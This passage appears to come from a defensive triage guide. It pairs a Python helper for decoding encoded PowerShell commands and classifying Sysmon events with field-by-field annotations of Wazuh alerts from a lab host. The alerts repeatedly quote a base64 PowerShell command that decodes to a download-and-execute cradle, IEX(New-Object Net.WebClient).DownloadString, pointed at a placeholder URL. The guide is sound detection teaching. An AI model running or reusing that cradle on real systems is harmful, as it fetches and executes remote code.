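    """Distinct cradle tokens found in a script, in order of first appearance."""
    seen = []
    for tok in CRADLE_RE.findall(script):
        if tok.lower() not in [s.lower() for s in seen]:
            seen.append(tok)
    return seen


def guid_start_time(process_guid: str) -> str:
    """Sysmon packs the process start time (Unix seconds) into the 2nd (low) and 3rd (high) GUID fields."""
    _, lo, hi, _, _ = process_guid.strip("{}").split("-")
    ts = (int(hi, 16) << 16) | int(lo, 16)
    return datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def is_policy_test_file(target: str) -> bool:
    return POLICY_TEST_RE.search(target) is not None


def triage(message: str) -> dict:
    """Classify one Sysmon message block and return findings an analyst can act on."""
    ev = parse_sysmon_message(message)
    out = {"event": ev["EventType"], "process_guid": ev.get("ProcessGuid")}
    if ev["EventType"] == "Process Create":
        script = decode_encoded_command(ev.get("CommandLine", ""))
        out["decoded_command"] = script
        out["cradle"] = cradle_indicators(script) if script else []
        out["started"] = guid_start_time(ev["ProcessGuid"])
        out["parent_started"] = guid_start_time(ev["ParentProcessGuid"])
        out["same_image_as_parent"] = ev.get("Image", "").lower() == ev.get("ParentImage", "").lower()
        out["verdict"] = "suspicious" if out["cradle"] else "review"
    elif ev["EventType"] == "File created":
        probe = is_policy_test_file(ev.get("TargetFilename", ""))
        out["policy_test_probe"] = probe
        # The probe file is PowerShell noise; the writer's ProcessGuid is the pivot to its EID 1.
        out["verdict"] = "pivot-to-writer" if probe else "review"
    return out


if __name__ == "__main__":
    for msg in (EID1_MESSAGE, EID11_MESSAGE):
        print(triage(msg))
```

In practice feed data.win.system.message straight from the alert JSON into triage(). The Wazuh rule matched on the -EncodedCommand flag; decoding the payload is left to the analyst, which is what this does, and it turns the "file dropped in Temp" alert into a pointer at the process that matters rather than a ticket about a benign .ps1.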
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.807809 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; Sysmon, so eventID is on the Sysmon scale.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider; constant, safe to filter on.
data.win.system.eventID: 1 Sysmon Event ID 1, Process Create.
data.win.system.version: 5 Schema version of the EID 1 event type.
data.win.system.level: 4 ETW level 4 = Informational; every Sysmon event uses it.
data.win.system.task: 1 Task category; repeats the event ID for Sysmon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:04.5719304Z When the record was logged; the process started at UtcTime in the message (22:34:03.416), about a second earlier.
data.win.system.eventRecordID: 280933 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not the process described.
data.win.system.threadID: 4740 Sysmon service thread; not the subject.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname in the event header; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:03.416
ProcessGuid: {94294ddc-bc5b-680a-510a-000000000e00}
ProcessId: 8180
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc59-680a-4f0a-000000000e00}
ParentProcessId: 11636
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered message text; same fields as the data.win.eventdata.* entries below.
data.win.eventdata.utcTime: 2025-04-24 22:34:03.416 Process start time per Sysmon; 4.6 s after the previous encoded-command PowerShell (PID 10156 at 22:33:58.812).
data.win.eventdata.processGuid: {94294ddc-bc5b-680a-510a-000000000e00} Sysmon process GUID; time field bc5b decodes to 22:34:03, matching utcTime.
data.win.eventdata.processId: 8180 Windows PID of this link in the chain.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe The genuine System32 powershell.exe again.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image.
data.win.eventdata.description: Windows PowerShell Description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the version resource; consistent with the image name.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Byte-for-byte the same encoded cradle as the earlier alert: IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). One payload, repeated launches.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory; the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Local account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Same logon session as the earlier alert.
data.win.eventdata.logonId: 0x26584 Same logon session ID; one interactive session is driving the whole chain.
data.win.eventdata.terminalSessionId: 1 Interactive session 1.
data.win.eventdata.integrityLevel: Medium Still not elevated.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Same SHA256 as before; the one powershell.exe on disk.
data.win.eventdata.parentProcessGuid: {94294ddc-bc59-680a-4f0a-000000000e00} Parent GUID; time field bc59 decodes to 22:34:01, two seconds before this child.
data.win.eventdata.parentProcessId: 11636 Parent PID. Not 10156, the child from the earlier alert, so the chain has links whose Process Create events are not in this section.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe PowerShell spawning PowerShell again.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Identical to the child's command line; the parent was itself an instance of the same cradle.
data.win.eventdata.parentUser: Attacker\\Attcker1 Same account as the child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.815875 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; Sysmon, so eventID is on the Sysmon scale.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider; constant, safe to filter on.
data.win.system.eventID: 1 Sysmon Event ID 1, Process Create.
data.win.system.version: 5 Schema version of the EID 1 event type.
data.win.system.level: 4 ETW level 4 = Informational; every Sysmon event uses it.
data.win.system.task: 1 Task category; repeats the event ID for Sysmon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:10.9720728Z When the record was logged; the process started at UtcTime in the message (22:34:09.726).
data.win.system.eventRecordID: 280968 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not the process described.
data.win.system.threadID: 4740 Sysmon service thread; not the subject.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname in the event header; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:09.726
ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00}
ProcessId: 3924
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc5d-680a-530a-000000000e00}
ParentProcessId: 2372
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Rendered message text; same fields as the data.win.eventdata.* entries below.
data.win.eventdata.utcTime: 2025-04-24 22:34:09.726 Process start time per Sysmon; the third encoded-command launch in this section, roughly six seconds after the previous one (PID 8180 at 22:34:03.416).
data.win.eventdata.processGuid: {94294ddc-bc61-680a-550a-000000000e00} Sysmon process GUID; time field bc61 decodes to 22:34:09, matching utcTime.
data.win.eventdata.processId: 3924 Windows PID of this link in the chain.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe The genuine System32 powershell.exe.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image.
data.win.eventdata.description: Windows PowerShell Description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the version resource.
data.win.eventdata.company: Microsoft Corporation Company string from the version resource.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name from the version resource; consistent with the image name.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA The same encoded cradle once more: IEX(New-Object Net.WebClient).DownloadString('https://example.com/test').
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory; the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Local account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Same logon session as the earlier alerts.
data.win.eventdata.logonId: 0x26584 Same logon session ID throughout the chain.
data.win.eventdata.terminalSessionId: 1 Interactive session 1.
data.win.eventdata.integrityLevel: Medium Still not elevated.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Same SHA256 as before.
data.win.eventdata.parentProcessGuid: {94294ddc-bc5d-680a-530a-000000000e00} Parent GUID; time field bc5d decodes to 22:34:05, four seconds before this child.
data.win.eventdata.parentProcessId: 2372 Parent PID. Again not the previous alert's child (8180), so intermediate launches exist outside this section.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe PowerShell spawning PowerShell.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Identical to the child's command line; the parent was itself an instance of the same cradle.
data.win.eventdata.parentUser: Attacker\\Attcker1 Same account as the child.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.823937 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; Sysmon, so eventID is on the Sysmon scale.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider; constant, safe to filter on.
data.win.system.eventID: 11 Sysmon Event ID 11, FileCreate: a file was created or overwritten. Follow up on the writing process, not the path.
data.win.system.version: 2 Schema version of the EID 11 event type.
data.win.system.level: 4 ETW level 4 = Informational; every Sysmon event uses it.
data.win.system.task: 11 Task category; repeats the event ID for Sysmon.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:11.1938944Z When the record was logged; the file was created at UtcTime in the message (22:34:11.163).
data.win.system.eventRecordID: 280969 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service writing the record, not of the process that created the file.
data.win.system.threadID: 4740 Sysmon service thread; not the subject.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the agent subscribed to.
data.win.system.computer: Attacker Hostname in the event header; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:34:11.163
ProcessGuid: {94294ddc-bc61-680a-550a-000000000e00}
ProcessId: 3924
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dobv25yk.2l4.ps1
CreationUtcTime: 2025-04-24 22:34:11.163
User: Attacker\Attcker1" Sysmon's rendered message text. The same fields are parsed into data.win.eventdata below; search on those, not on this free text.
data.win.eventdata.utcTime: 2025-04-24 22:34:11.163 When Sysmon observed the file creation (UTC, ms). The timestamp to use for timelines.
data.win.eventdata.processGuid: {94294ddc-bc61-680a-550a-000000000e00} Sysmon's process GUID: unique per process instance, even across PID reuse and reboots. The join key between this file create and the creating process's own EID 1, which is not on this page.
data.win.eventdata.processId: 3924 Windows PID of the creating process. PIDs are reused after exit; join on processGuid instead.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dobv25yk.2l4.ps1 File that was created. __PSScriptPolicyTest_<random>.ps1 in %TEMP% is written by powershell.exe itself at startup to test whether AppLocker/WDAC script enforcement applies; on its own it is benign noise that trips any "script dropped in Temp" rule. The signal is the creating process (join on processGuid), not the file.
data.win.eventdata.creationUtcTime: 2025-04-24 22:34:11.163 File system creation time. Equal to utcTime for a brand-new file, as here; earlier when an existing file was overwritten.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process runs as (HOST\user). "Attcker1" is the account's actual spelling on this host; search for it as written.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534206.826701 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that emitted the event. Sysmon here, so read eventID against the Sysmon event table, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Provider GUID; Sysmon's fixed GUID, the same on every host and version.
data.win.system.eventID: 1 Sysmon event ID, not a Security log ID: 1 = ProcessCreate, the Sysmon counterpart of Security 4688 with the hashes, process GUIDs and parent command line that 4688 lacks.
data.win.system.version: 5 Version of this event's field layout. EID 1 has gained fields over Sysmon releases (ParentUser among them), so parsers should key on eventID plus version.
data.win.system.level: 4 Event level; 4 = Informational. Sysmon logs its telemetry at level 4, so severity comes from the Wazuh rule, not from here.
data.win.system.task: 1 Task category. For Sysmon events it mirrors the event ID (1 = Process Create).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:34:19.4863479Z When the event was written to the log (UTC). Sysmon observed the process start 1.4 s earlier (eventdata.utcTime 22:34:18.124); ordering by systemTime can misplace events, so use utcTime.
data.win.system.eventRecordID: 281055 Incremental log record number – handy for timeline order. The file create in record 281056 follows directly.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the event, not of the process being reported (that is eventdata.processId, 12136). Never pivot on it.
data.win.system.threadID: 4740 Thread of the Sysmon service that wrote the event. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in. Filter on it to separate Sysmon from Security and System.
data.win.system.computer: Attacker Hostname recorded by the event log. Should equal agent.name; a mismatch means forwarded events or a renamed host.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:34:18.124
ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00}
ProcessId: 12136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bc66-680a-590a-000000000e00}
ParentProcessId: 11716
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Sysmon's rendered message text. The same fields are parsed into data.win.eventdata below; search on those, not on this free text.
data.win.eventdata.utcTime: 2025-04-24 22:34:18.124 When Sysmon observed the process start (UTC, ms). Use this for timelines.
data.win.eventdata.processGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} Sysmon's process GUID for the new process, unique even across PID reuse and reboots. The EID 11 file create in record 281056 carries this same GUID, which ties that file drop to this encoded-command PowerShell.
data.win.eventdata.processId: 12136 Windows PID; reused after exit, so join on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the started executable.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Version-resource description of the image.
data.win.eventdata.product: Microsoft® Windows® Operating System Version-resource product name.
data.win.eventdata.company: Microsoft Corporation Version-resource company name. Trivially forged in a rebuilt binary; trust the hash, not this.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary. Compare with image: a match, as here, is expected; an image named differently (say svchost.exe carrying OriginalFileName PowerShell.EXE) is a renamed copy.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. The quoted powershell.exe path appears twice: the first is the image, the second is passed to it as its first argument. -NoLogo hides the banner, -NoProfile skips profile scripts, and -EncodedCommand takes a base64 blob of UTF-16LE script text; this one decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle. What https://example.com/test served back is not visible in these events.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root here.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (HOST\user).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's identifier for the logon session. Identical across every event on this page, so all of this activity belongs to one session.
